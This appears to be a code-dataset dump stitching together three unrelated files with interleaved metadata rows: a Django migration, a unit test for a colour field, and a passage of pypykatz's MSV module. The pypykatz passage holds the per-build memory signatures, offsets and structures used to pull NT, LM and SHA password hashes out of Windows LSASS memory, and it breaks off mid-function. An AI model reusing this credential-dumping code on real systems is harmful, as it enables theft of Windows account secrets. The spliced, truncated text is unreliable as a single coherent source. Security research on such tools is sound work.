from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('questions', '0006_auto_20160803_1619'),
]
operations = [
migrations.AddField(
model_name='catalog',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this catalog.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='catalog',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this catalog. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='catalog',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this catalog (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='catalog',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this catalog.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='questionentity',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this question/questionset.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='questionentity',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this question/questionset. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='questionentity',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this question/questionset (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='questionentity',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this question/questionset.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='section',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this section.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='section',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this section. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='section',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this section (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='section',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this section.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AddField(
model_name='subsection',
name='comment',
field=models.TextField(blank=True, help_text='Additional information about this subsection.', null=True, verbose_name='Comment'),
),
migrations.AddField(
model_name='subsection',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this subsection. The URI will be generated from this key.', max_length=128, null=True, verbose_name='Key'),
),
migrations.AddField(
model_name='subsection',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this subsection (auto-generated).', max_length=640, null=True, verbose_name='URI'),
),
migrations.AddField(
model_name='subsection',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this subsection.', max_length=256, null=True, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='catalog',
name='order',
field=models.IntegerField(default=0, help_text='The position of this catalog in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='catalog',
name='title_de',
field=models.CharField(help_text='The German title for this catalog.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='catalog',
name='title_en',
field=models.CharField(help_text='The English title for this catalog.', max_length=256, verbose_name='Title (en)'),
),
migrations.AlterField(
model_name='question',
name='parent',
field=models.ForeignKey(blank=True, help_text='The question set this question belongs to.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='questions', to='questions.QuestionEntity', verbose_name='Parent'),
),
migrations.AlterField(
model_name='question',
name='text_de',
field=models.TextField(help_text='The German text for this question.', verbose_name='Text (de)'),
),
migrations.AlterField(
model_name='question',
name='text_en',
field=models.TextField(help_text='The English text for this question.', verbose_name='Text (en)'),
),
migrations.AlterField(
model_name='question',
name='widget_type',
field=models.CharField(choices=[('text', 'Text'), ('textarea', 'Textarea'), ('yesno', 'Yes/No'), ('checkbox', 'Checkboxes'), ('radio', 'Radio buttons'), ('select', 'Select drop-down'), ('range', 'Range slider'), ('date', 'Date picker')], help_text='Type of widget for this question.', max_length=12, verbose_name='Widget type'),
),
migrations.AlterField(
model_name='questionentity',
name='attribute_entity',
field=models.ForeignKey(blank=True, help_text='The attribute/entity this question belongs to.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='domain.AttributeEntity', verbose_name='Attribute entity'),
),
migrations.AlterField(
model_name='questionentity',
name='help_de',
field=models.TextField(blank=True, help_text='The German help text for this question/questionset.', null=True, verbose_name='Help (de)'),
),
migrations.AlterField(
model_name='questionentity',
name='help_en',
field=models.TextField(blank=True, help_text='The English help text for this question/questionset.', null=True, verbose_name='Help (en)'),
),
migrations.AlterField(
model_name='questionentity',
name='label_de',
field=models.TextField(help_text='The German label for this question/questionset (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='questionentity',
name='label_en',
field=models.TextField(help_text='The English label for this question/questionset (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='questionentity',
name='order',
field=models.IntegerField(default=0, help_text='The position of this subsection in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='questionentity',
name='subsection',
field=models.ForeignKey(help_text='The section this question belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='entities', to='questions.Subsection', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='section',
name='catalog',
field=models.ForeignKey(help_text='The catalog this section belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='sections', to='questions.Catalog', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='section',
name='label_de',
field=models.TextField(help_text='The German label for this section (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='section',
name='label_en',
field=models.TextField(help_text='The English label for this section (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='section',
name='order',
field=models.IntegerField(default=0, help_text='The position of this section in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='section',
name='title_de',
field=models.CharField(help_text='The German title for this section.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='section',
name='title_en',
field=models.CharField(help_text='The English title for this section.', max_length=256, verbose_name='Title (en)'),
),
migrations.AlterField(
model_name='subsection',
name='label_de',
field=models.TextField(help_text='The German label for this subsection (auto-generated).', verbose_name='Label (de)'),
),
migrations.AlterField(
model_name='subsection',
name='label_en',
field=models.TextField(help_text='The English label for this subsection (auto-generated).', verbose_name='Label (en)'),
),
migrations.AlterField(
model_name='subsection',
name='order',
field=models.IntegerField(default=0, help_text='The position of this subsection in lists.', verbose_name='Order'),
),
migrations.AlterField(
model_name='subsection',
name='section',
field=models.ForeignKey(help_text='The section this subsection belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='subsections', to='questions.Section', verbose_name='Catalog'),
),
migrations.AlterField(
model_name='subsection',
name='title_de',
field=models.CharField(help_text='The German title for this subsection.', max_length=256, verbose_name='Title (de)'),
),
migrations.AlterField(
model_name='subsection',
name='title_en',
field=models.CharField(help_text='The English title for this subsection.', max_length=256, verbose_name='Title (en)'),
),
]
| 50.726872 | 340 | 0.62475 | 1,276 | 11,515 | 5.492163 | 0.094828 | 0.050228 | 0.058076 | 0.107591 | 0.875285 | 0.866153 | 0.830908 | 0.74258 | 0.695919 | 0.627426 | 0 | 0.010548 | 0.250803 | 11,515 | 226 | 341 | 50.951327 | 0.801785 | 0.005645 | 0 | 0.730594 | 1 | 0 | 0.297283 | 0.0152 | 0.004566 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013699 | 0 | 0.027397 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b37fb4d04904cef091e66d1e7ce3047f30e0754 | 7,357 | py | Python | tests/unit/models/field/color.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 5 | 2020-08-26T20:12:00.000Z | 2020-12-11T16:39:22.000Z | tests/unit/models/field/color.py | RaenonX/Jelly-Bot | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 234 | 2019-12-14T03:45:19.000Z | 2020-08-26T18:55:19.000Z | tests/unit/models/field/color.py | RaenonX/Jelly-Bot-API | c7da1e91783dce3a2b71b955b3a22b68db9056cf | [
"MIT"
] | 2 | 2019-10-23T15:21:15.000Z | 2020-05-22T09:35:55.000Z | from typing import Type, Any, Tuple
from extutils.color import Color, ColorFactory
from models.field import ColorField, BaseField
from models.field.exceptions import (
FieldTypeMismatchError, FieldNoneNotAllowedError, FieldValueInvalidError, FieldError
)
from ._test_val import TestFieldValue
from ._test_prop import TestFieldProperty
__all__ = ["TestColorFieldProperty", "TestColorFieldValueAllowNone",
"TestColorFieldValueDefault", "TestColorFieldValueNoAutoCast"]
class TestColorFieldProperty(TestFieldProperty.TestClass):
def get_field_class(self) -> Type[BaseField]:
return ColorField
def valid_not_none_obj_value(self) -> Any:
return ColorFactory.WHITE
def expected_none_object(self) -> Any:
return ColorFactory.DEFAULT
def get_valid_default_values(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_default_values(self) -> Tuple[Any, ...]:
return True, -8000, 20000000, "GGGGGG"
def get_expected_types(self) -> Tuple[Type[Any], ...]:
return Color, int, str
def get_desired_type(self) -> Type[Any]:
return Color
class TestColorFieldValueDefault(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k")
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return True
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(None, FieldNoneNotAllowedError),
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
class TestColorFieldValueAllowNone(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k", allow_none=True)
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, True),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, True),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return True
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(None, None),
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(None, None),
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
class TestColorFieldValueNoAutoCast(TestFieldValue.TestClass):
def get_field(self) -> BaseField:
return ColorField("k", auto_cast=False)
def get_value_type_match_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, True),
(20000000, True),
("GGGGGG", True)
)
def get_value_validity_test(self) -> Tuple[Tuple[Any, bool], ...]:
return (
(None, False),
(ColorFactory.DEFAULT, True),
(5723991, True),
("#575757", True),
("575757", True),
(Color(5723991), True),
(True, False),
(-8000, False),
(20000000, False),
("GGGGGG", False)
)
def is_auto_cast(self) -> bool:
return False
def get_values_to_cast(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, Color(5723991)),
("#575757", Color(5723991)),
("575757", Color(5723991)),
(Color(5723991), Color(5723991))
)
def get_valid_value_to_set(self) -> Tuple[Tuple[Any, Any], ...]:
return (
(ColorFactory.DEFAULT, ColorFactory.DEFAULT),
(5723991, 5723991),
("#575757", "#575757"),
("575757", "575757"),
(Color(5723991), Color(5723991))
)
def get_invalid_value_to_set(self) -> Tuple[Tuple[Any, Type[FieldError]], ...]:
return (
(None, FieldNoneNotAllowedError),
(True, FieldTypeMismatchError),
(-8000, FieldValueInvalidError),
(20000000, FieldValueInvalidError),
("GGGGGG", FieldValueInvalidError),
)
| 31.575107 | 88 | 0.541253 | 643 | 7,357 | 6.051322 | 0.102644 | 0.117194 | 0.092778 | 0.069905 | 0.76587 | 0.764328 | 0.764328 | 0.764328 | 0.764328 | 0.733488 | 0 | 0.129958 | 0.318064 | 7,357 | 232 | 89 | 31.711207 | 0.645605 | 0 | 0 | 0.746193 | 0 | 0 | 0.047574 | 0.014272 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142132 | false | 0 | 0.030457 | 0.142132 | 0.335025 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
1b71c41b49693648dbe9613cc7d39e5c2be6f5e4 | 34,817 | py | Python | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 1,861 | 2018-05-26T11:16:39.000Z | 2022-03-24T19:48:55.000Z | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 77 | 2018-05-28T21:43:31.000Z | 2021-12-05T00:11:31.000Z | pypykatz/alsadecryptor/packages/msv/templates.py | wisdark/pypykatz | 7dccf2fa52532586da9b5ae3e849928b4ba5a3ba | [
"MIT"
] | 270 | 2018-05-26T16:42:14.000Z | 2022-03-24T03:05:08.000Z | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import BOOLEAN, HANDLE, USHORT, ULONG, LSA_UNICODE_STRING, LSAISO_DATA_BLOB, \
BYTE, PVOID, WORD, DWORD, POINTER, LUID, PSID, ANSI_STRING
from pypykatz.alsadecryptor.package_commons import PackageTemplate
class MsvTemplate(PackageTemplate):
def __init__(self):
super().__init__('Msv')
self.signature = None
self.first_entry_offset = None
self.offset2 = None
self.list_entry = None
self.encrypted_credentials_list_struct = None
self.encrypted_credential_struct = None
self.decrypted_credential_struct = None
@staticmethod
def get_template(sysinfo):
template = MsvTemplate()
template.encrypted_credentials_list_struct = KIWI_MSV1_0_CREDENTIAL_LIST
template.log_template('encrypted_credentials_list_struct', template.encrypted_credentials_list_struct)
template.encrypted_credential_struct = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
template.log_template('encrypted_credential_struct', template.encrypted_credential_struct)
#identify credential session list structure to be used
if sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.list_entry = PKIWI_MSV1_0_LIST_51
elif sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.list_entry = PKIWI_MSV1_0_LIST_52
elif sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
template.list_entry = PKIWI_MSV1_0_LIST_60
elif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
#do not do that :)
if sysinfo.msv_dll_timestamp > 0x53480000:
template.list_entry = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
else:
template.list_entry = PKIWI_MSV1_0_LIST_61
elif sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
#template.list_entry = PKIWI_MSV1_0_LIST_62
if sysinfo.msv_dll_timestamp > 0x53480000:
template.list_entry = PKIWI_MSV1_0_LIST_63
else:
template.list_entry = PKIWI_MSV1_0_LIST_62
else:
template.list_entry = PKIWI_MSV1_0_LIST_63
template.log_template('list_entry', template.list_entry)
if sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_DEC
elif sysinfo.buildnumber < WindowsBuild.WIN_10_1511.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC
elif sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_DEC
else:
template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC
template.log_template('decrypted_credential_struct', template.decrypted_credential_struct)
if sysinfo.architecture == KatzSystemArchitecture.X64:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
template.first_entry_offset = -4
template.offset2 = 0
elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
template.first_entry_offset = -4
template.offset2 = -45
elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
template.signature = b'\x33\xff\x45\x85\xc0\x41\x89\x75\x00\x4c\x8b\xe3\x0f\x84'
template.first_entry_offset = 21#-4
template.offset2 = -4
elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
template.signature = b'\x33\xf6\x45\x89\x2f\x4c\x8b\xf3\x85\xff\x0f\x84'
template.first_entry_offset = 19
template.offset2 = -4
elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\xde\x48\x8d\x0c\x5b\x48\xc1\xe1\x05\x48\x8d\x05'
template.first_entry_offset = 36
template.offset2 = -6
elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1703.value:
#1503 and 1603
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif WindowsBuild.WIN_10_1703.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1803.value:
#1703
template.signature = b'\x33\xff\x45\x89\x37\x48\x8b\xf3\x45\x85\xc9\x74'
template.first_entry_offset = 23
template.offset2 = -4
elif WindowsBuild.WIN_10_1803.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1903.value:
#1803
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc9\x74'
template.first_entry_offset = 23
template.offset2 = -4
else:
#1903
template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
template.first_entry_offset = 23
template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
template.signature = b'\xff\x50\x10\x85\xc0\x0f\x84'
template.first_entry_offset = 24
template.offset2 = 0
elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
template.first_entry_offset = -11
template.offset2 = -43
elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
template.first_entry_offset = -11
template.offset2 = -42
elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
template.signature = b'\x8b\x45\xf8\x8b\x55\x08\x8b\xde\x89\x02\x89\x5d\xf0\x85\xc9\x74'
template.first_entry_offset = 18
template.offset2 = -4
elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\x4d\xe4\x8b\x45\xf4\x89\x75\xe8\x89\x01\x85\xff\x74'
template.first_entry_offset = 16
template.offset2 = -4
elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1507.value:
template.signature = b'\x8b\x4d\xe8\x8b\x45\xf4\x89\x75\xec\x89\x01\x85\xff\x74'
template.first_entry_offset = 16
template.offset2 = -4
else:
raise Exception('Could not identify template! sysinfo.buildnumber: %d' % sysinfo.buildnumber)
else:
raise Exception('Unknown Architecture: %s , Build number %s' % (sysinfo.architecture, sysinfo.buildnumber))
return template
class MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC:
#this structure doesnt have username nor domainname, but has credentials :S
#starts with
size = 0x60
def __init__(self):
self.unk1 = None
self.unk2 = None
self.unk_tag = None
self.unk_remaining_size = None
self.LengthOfNtOwfPassword = None
self.NtOwfPassword = None
self.LengthOfShaOwfPassword = None
self.ShaOwPassword = None
self.LogonDomainName = None
self.UserName = None
self.LmOwfPassword = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC()
res.unk1 = await USHORT.loadvalue(reader)
res.unk2 = await USHORT.loadvalue(reader)
res.unk_tag = await reader.read(4) #0xcccccc
res.unk_remaining_size = await ULONG.loadvalue(reader)
await reader.read(40)
res.LengthOfNtOwfPassword = await ULONG.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LengthOfShaOwfPassword = await ULONG.loadvalue(reader)
res.ShaOwPassword = await reader.read(20)
res.LogonDomainName = None
res.UserName = None
res.LmOwfPassword = None
res.isNtOwfPassword = None
res.isLmOwfPassword = None
res.isShaOwPassword = None
return res
class MSV1_0_PRIMARY_CREDENTIAL_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.align0 = None
self.align1 = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.align0 = None
self.align1 = None
self.align2 = None
self.align3 = None
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.align2 = await BYTE.loadvalue(reader)
res.align3 = await BYTE.loadvalue(reader)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC:
def __init__(self):
self.LogonDomainName = None
self.UserName = None
self.pNtlmCredIsoInProc = None
self.isIso = None
self.isNtOwfPassword = None
self.isLmOwfPassword = None
self.isShaOwPassword = None
self.isDPAPIProtected = None
self.align0 = None
self.align1 = None
self.align2 = None
self.unkD = None
# stuff to be done! #pragma pack(push, 2)
self.isoSize = None
self.DPAPIProtected = None
self.align3 = None
# stuff to be done! #pragma pack(pop)
self.NtOwfPassword = None
self.LmOwfPassword = None
self.ShaOwPassword = None
@staticmethod
async def load(reader):
res = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC()
res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.pNtlmCredIsoInProc = await PVOID.loadvalue(reader)
res.isIso = await BOOLEAN.loadvalue(reader)
res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
res.isDPAPIProtected = await BOOLEAN.loadvalue(reader)
res.align0 = await BYTE.loadvalue(reader)
res.align1 = await BYTE.loadvalue(reader)
res.align2 = await BYTE.loadvalue(reader)
res.unkD = await DWORD.loadvalue(reader) # // 1/2
# stuff to be done! #pragma pack(push, 2)
res.isoSize = await WORD.loadvalue(reader) #// 0000
res.DPAPIProtected = await reader.read(16)
res.align3 = await DWORD.loadvalue(reader) #// 00000000
# stuff to be done! #pragma pack(pop)
res.NtOwfPassword = await reader.read(16)
res.LmOwfPassword = await reader.read(16)
res.ShaOwPassword = await reader.read(20)
return res
class KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC:
def __init__(self):
self.Flink = None
self.Primary = None
self.encrypted_credentials = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
res.Flink = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
res.Primary = await ANSI_STRING.load(reader)
await reader.align()
res.encrypted_credentials = await LSA_UNICODE_STRING.load(reader)
return res
class PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
return p
#class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
# def __init__(self, reader):
# super().__init__(reader, PKIWI_MSV1_0_CREDENTIAL_LIST)
class KIWI_MSV1_0_CREDENTIAL_LIST:
def __init__(self):
self.Flink = None
self.AuthenticationPackageId = None
self.PrimaryCredentials_ptr = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_CREDENTIAL_LIST()
res.Flink = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.AuthenticationPackageId = await DWORD.loadvalue(reader)
await reader.align()
